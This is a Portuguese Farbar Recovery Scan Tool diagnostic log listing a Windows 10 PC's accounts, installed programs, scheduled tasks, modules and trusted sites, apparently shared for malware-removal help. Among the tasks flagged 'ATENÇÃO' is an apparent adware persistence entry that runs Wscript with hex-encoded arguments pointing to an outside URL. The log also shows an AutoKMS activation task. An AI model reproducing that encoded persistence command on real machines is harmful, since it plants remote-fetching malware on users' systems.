Addition.txt

Document joint : FIfaLrVeLMW_Addition.txt

Cliquez pour partager vos propres fichiers

Format du document : text/plain

Prévisualisation

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 31-08-2016
Executado por rafael (04-09-2016 19:35:17)
Executando a partir de C:\Users\gabri\Desktop
Windows 10 Pro Versão 1607 (X64) (2016-08-07 16:54:35)
Modo da Inicialização: Normal
==========================================================

==================== Contas: =============================

Administrador (S-1-5-21-4085003843-1987285651-1473373783-500 - Administrator - Disabled)
Convidado (S-1-5-21-4085003843-1987285651-1473373783-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-4085003843-1987285651-1473373783-503 - Limited - Disabled)
rafael (S-1-5-21-4085003843-1987285651-1473373783-1001 - Administrator - Enabled) => C:\Users\gabri

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\uTorrent) (Version: 3.4.8.42449 - BitTorrent Inc.)
4500_G510af_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
4500G510af (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
4500G510af_Software_Min (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Akamai NetSession Interface (HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\Akamai) (Version: - Akamai Technologies, Inc)
Ansel (Version: 372.70 - NVIDIA Corporation) Hidden
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.5 - ASUS)
Autodesk Advanced Material Library Image Library 2016 (HKLM-x32\...\{94AD53E7-493B-4291-8714-7A3B761D2783}) (Version: 6.3.0.15 - Autodesk)
Autodesk Material Library 2016 (HKLM-x32\...\{29A7D6EC-63C2-42FD-8143-5812ABD2923F}) (Version: 6.3.0.15 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2016 (HKLM-x32\...\{6B4CFC6E-ECB0-47FE-95D3-65C680ED0687}) (Version: 6.3.0.15 - Autodesk)
Bing Powered Search (HKLM-x32\...\BingPoweredSearch) (Version: - )
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.70.1080 - AB Team, d.o.o.)
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Counter-Strike Global Offensive WaRzOnE (HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\CSGO) (Version: - CS WaRzOnE)
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
ELAN Touchpad 11.15.0.14_X64 (HKLM\...\Elantech) (Version: 11.15.0.14 - ELAN Microelectronic Corp.)
Emergency Download Driver (HKLM-x32\...\{3F0F5AB4-C9CE-4226-8393-E9CFF8369D9D}) (Version: 1.1.16.1526 - Microsoft)
Fallout New Vegas Ultimate Edition version 1.4.0.525 (HKLM-x32\...\Fallout New Vegas Ultimate Edition_is1) (Version: 1.4.0.525 - Mr DJ)
Foxit Cloud (HKLM-x32\...\{41914D8B-9D6E-4764-A1F9-BC43FB6782C1}_is1) (Version: 3.7.135.908 - Foxit Software Inc.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.2.0.722 - Foxit Software Inc.)
Geeks3D FurMark 1.17.0.0 (HKLM-x32\...\{2397CAD4-2263-4CD0-96BE-E43A980B9C9A}_is1) (Version: - Geeks3D)
GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
GPU Caps Viewer 1.23.0.2 (HKLM-x32\...\{F6E04BE8-2FA4-44C4-9BD3-142CE3EB15B4}_is1) (Version: - Geeks3D.com)
HP Officejet 4500 G510a-f 14.0 Rel. 6 (HKLM\...\{A49C5804-8F24-433C-99B2-9F9F541090C7}) (Version: 14.0 - HP)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
jetAudio Basic (HKLM-x32\...\{DF8195AF-8E6F-4487-A0EE-196F7E3F4B8A}) (Version: 8.1.0 - COWON)
K-Lite Codec Pack 11.3.6 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.3.6 - )
Maxthon Cloud Browser (HKLM-x32\...\Maxthon3) (Version: 4.9.3.1000 - Maxthon International Limited)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.6213.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneNote 2013 (HKLM\...\Office15.ONENOTER) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{C79A7EAB-9D6F-4072-8A6D-F8F54957CD93}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version: - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{5DDC2234-4B37-45BC-AD33-41F1469B4D83}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom (HKLM\...\{0E8670B8-3965-4930-ADA6-570348B67153}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Visio Professional 2013 (HKLM\...\Office15.VISPROR) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU (HKLM\...\Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU) (Version: - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft VSS Writer for SQL Server 2012 (HKLM\...\{3E0DD83F-BE4C-4478-86A0-AD0D79D1353E}) (Version: 11.0.2100.60 - Microsoft Corporation)
Mozilla Firefox 47.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 47.0.1 (x86 pt-BR)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
No Man's Sky (HKLM-x32\...\1446213994_is1) (Version: 2.0.0.2 - GOG.com)
No Man's Sky Pre-order DLC (HKLM-x32\...\2022706229_is1) (Version: 2.0.0.2 - GOG.com)
Nokia PC Internet Access (HKLM-x32\...\Nokia PC Internet Access) (Version: 2.0.2.2 - Nokia)
Nokia PC Internet Access (x32 Version: 2.0.2.2 - Nokia) Hidden
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA Graphics Driver 372.70 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 372.70 - NVIDIA Corporation)
NVIDIA Software do sistema PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Pacote de Driver do Windows - ASUS (ATP) Mouse (06/17/2015 1.0.0.262) (HKLM\...\14588A15B66655338DBCC021FFA81E31DC281859) (Version: 06/17/2015 1.0.0.262 - ASUS)
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.6 - Power Software Ltd)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.10.714.2016 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Revisores de Texto do Microsoft Office 2013 – Português do Brasil (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
Secure Download Manager (HKLM-x32\...\{F0858165-B8DB-4347-89B8-6D9F882B9BF3}) (Version: 3.1.60 - Kivuto Solutions Inc.)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{91150000-0051-0000-1000-0000000FF1CE}_Office15.VISPROR_{F0C12872-B60D-4E37-A2F9-20C46A5E1F1A}) (Version: - Microsoft)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{91150000-00A1-0000-1000-0000000FF1CE}_Office15.ONENOTER_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation)
Skype™ 7.7 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.7.103 - Skype Technologies S.A.)
SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
SQL Server 2012 Common Files (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server Browser for SQL Server 2012 (HKLM-x32\...\{4B9E6EB0-0EED-4E74-9479-F982C3254F71}) (Version: 11.0.2100.60 - Microsoft Corporation)
Sql Server Customer Experience Improvement Program (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
Switch Sound File Converter (HKLM-x32\...\Switch) (Version: 5.06 - NCH Software)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp)
Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft)
USB Serial Port Driver (HKLM-x32\...\{FE11883D-EA67-473C-BDD1-8D6B6DFCBEAC}) (Version: 1.1.8.1526 - Microsoft)
Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1-2) (Version: 1.0.11.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.11.1 (Version: 1.0.11.1 - LunarG, Inc.) Hidden
Warsaw 1.12.4.14 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.12.4.14 - GAS Tecnologia)
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
WinRAR 5.21 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WinUsb CoInstallers (HKLM-x32\...\{9755918A-CDF8-4F1E-8453-6359CF1A330A}) (Version: 1.1.12.1526 - Microsoft)
WinUSB Compatible ID Drivers (HKLM-x32\...\{A4A0B236-6046-4CAB-8177-1EAF61112C75}) (Version: 1.1.11.1526 - Microsoft)
WinUSB Drivers ext (HKLM-x32\...\{B7F55FF1-607A-4E12-BF64-8770BC618D12}) (Version: 1.1.23.1526 - Microsoft)

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{0B628DE4-07AD-4284-81CA-5B439F67C5E6}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe /Automation => Nenhum Arquivo
CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{149DD748-EA85-45A6-93C5-AC50D0260C98}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe => Nenhum Arquivo
CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{5370C727-1451-4700-A960-77630950AF6D}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe /Automation => Nenhum Arquivo
CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2016\en-US\acadficn.dll => Nenhum Arquivo

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {20B6C91A-A200-45D7-8C3B-ACB054A7DF39} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-08-22] (Microsoft Corporation)
Task: {232F203B-1299-4568-87DF-E62A339CA260} - System32\Tasks\RtHDVBg_ListenToDevice => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-08-07] (Realtek Semiconductor)
Task: {30F0A62D-F2D2-49C4-B1A1-1E20A5273FB3} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-08-10] (Microsoft Corporation)
Task: {5DE65750-A1E5-4E34-B419-73166D08B4F2} - System32\Tasks\Driver Booster Beta SkipUAC (gabri) => C:\Program Files (x86)\IObit\Driver Booster Beta\DriverBooster.exe
Task: {7645CF61-E0A3-4002-9632-50F61BCDD11B} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {8B0EADF4-DBA9-4E06-BFA8-AD6E005BB3E5} - System32\Tasks\{7A293573-E403-E6B5-A79D-3A6CD5BA8850} => C:\Users\gabri\AppData\Local\{5A9D6~1\Updater.exe [2013-04-09] () <==== ATENÇÃO
Task: {A0D444E0-28E6-4738-9634-200BB96A883F} - \GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-4085003843-1987285651-1473373783-1001 -> Nenhum Arquivo <==== ATENÇÃO
Task: {AE0E0B23-8B34-4F8E-9DAD-8BAEC6A66BD0} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {B123DC9E-77CF-4736-91B5-132F04950492} - System32\Tasks\Maxthon Update => C:\Program Files (x86)\Maxthon\Bin\MxEidolon.exe [2016-06-12] (Maxthon MxEidolo)
Task: {B40E9650-FF88-483E-B750-BFA952DB5E34} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {BF2FF39C-FD4B-4E59-A359-DC421F56A2F8} - System32\Tasks\Bing Powered Search sasir => Wscript.exe "C:\ProgramData\{12D0D7B3-9892-5D75-1E54-C337841648F9}\naca.txt" "687474703a2f2f79786870612e636f6d" "433a5c50726f6772616d446174615c7b31324430443742332d393839322d354437352d314535342d4333333738343136343846397d5c746574696c61" "433a5c50726f6772616d446174615c7b31324430443742332d393839322d354437352d314535 (a entrada de dados tem 78 mais caracteres).
Task: {C4523C41-B540-4859-8A6D-B3111050D928} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2015-08-21] ()
Task: {CC8CCCA9-8491-4A83-B631-1273271D881A} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe
Task: {F463CCFB-AB7D-4710-86AE-6305F887BE9B} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-08-07] (Realtek Semiconductor)

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\WINDOWS\Tasks\Bing Powered Search sasir.job => Wscript.exe C:\ProgramData\{12D0D7B3-9892-5D75-1E54-C337841648F9}\naca.txt <==== ATENÇÃO
Task: C:\WINDOWS\Tasks\{7A293573-E403-E6B5-A79D-3A6CD5BA8850}.job =>

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

Shortcut: C:\Users\gabri\Favorites\NCH Software Download Site.lnk -> hxxp://www.nch.com.au/index.html

==================== Módulos Carregados (Whitelisted) ==============

2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-07-16 08:42 - 2016-07-16 08:42 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-08-07 13:16 - 2016-08-25 18:12 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-06-30 18:28 - 2016-06-14 17:03 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2015-12-25 15:11 - 2016-06-14 17:03 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-06-30 18:28 - 2016-06-14 17:03 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-06-30 18:28 - 2016-06-14 17:03 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-06-30 18:28 - 2016-06-14 17:03 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-06-30 18:28 - 2016-06-14 17:03 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-06-30 18:28 - 2016-06-14 17:03 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-06-30 18:28 - 2016-06-14 17:03 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-06-30 18:28 - 2016-06-14 17:03 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-06-30 18:28 - 2016-06-14 17:03 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-07-16 08:42 - 2016-07-16 08:42 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-08-22 23:39 - 2016-08-22 23:39 - 01864384 _____ () C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll
2016-06-14 13:37 - 2016-06-14 13:37 - 08909504 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-08-19 16:32 - 2015-08-19 16:32 - 00110800 _____ () C:\Windows\Secure64.dll
2016-07-16 08:42 - 2016-07-16 08:42 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-07-16 08:43 - 2016-08-17 16:16 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-07-16 08:43 - 2016-08-24 00:54 - 09761280 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-08-25 23:56 - 2016-08-20 01:54 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-07-16 08:43 - 2016-08-24 00:54 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-07-16 08:43 - 2016-08-24 00:54 - 01033728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-08-25 23:55 - 2016-08-20 01:54 - 02438144 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-08-25 23:56 - 2016-08-20 01:56 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-08-29 06:12 - 2016-08-29 06:12 - 00071168 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.7.113.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-08-29 06:12 - 2016-08-29 06:12 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.7.113.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-08-29 06:12 - 2016-08-29 06:12 - 35288064 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.7.113.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2015-08-19 16:32 - 2015-08-19 16:32 - 00116944 _____ () C:\Windows\Secure.dll
2015-08-08 01:06 - 2016-06-14 17:03 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-08-22 23:39 - 2016-08-22 23:39 - 01383616 _____ () C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\ClientTelemetry.dll
2016-08-22 23:39 - 2016-08-22 23:39 - 00118976 _____ () C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\FileSyncViews.dll
2016-06-14 13:38 - 2016-06-14 13:38 - 08909504 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4 [2262]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\gbpddreg64.sys:X5ZN8aGvT4 [686]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [1198]
AlternateDataStreams: C:\ProgramData\GbPlugin:IncompleteStartGbprcm.cnt [10]
AlternateDataStreams: C:\Users\Todos os Usuários\GbPlugin:IncompleteStartGbprcm.cnt [10]

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)

==================== Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)

HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\Software\Classes\.scr: AutoCADScriptFile =>

==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

IE trusted site: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\bancobrasil.com.br -> www.bancobrasil.com.br
IE trusted site: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\bb.com.br -> aapj.bb.com.br
IE trusted site: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\gastecnologia.com.br -> cloud.gastecnologia.com.br

==================== Hosts Conteúdo: ===============================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2015-07-10 08:04 - 2015-07-10 08:02 - 00000824 ____N C:\WINDOWS\system32\Drivers\etc\hosts

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

